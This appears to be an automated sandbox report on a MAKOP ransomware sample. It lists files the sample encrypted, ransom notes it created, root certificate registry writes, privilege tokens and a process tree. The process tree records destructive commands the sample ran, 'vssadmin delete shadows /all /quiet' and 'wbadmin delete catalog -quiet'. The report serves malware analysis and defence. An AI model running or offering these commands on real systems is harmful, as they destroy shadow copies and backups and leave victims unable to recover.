| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\America\Argentina\readme-warning.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105294.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02845G.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\readme-warning.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\corner.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\THMBNAIL.PNG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTS.ICO | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALSO11.POC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\ACT3R.SAM | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\readme-warning.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\BLENDS.INF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199475.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293234.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_right.gif | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\settings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\sonicsptransform.ax | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer.[76AC78C0].[[email protected]].makop | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Sitka | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENVHM.POC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_COL.HXC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00798_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0300912.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\MSO.ACL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\VelvetRose.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_pressed.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Hermosillo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Beirut | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\drag.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
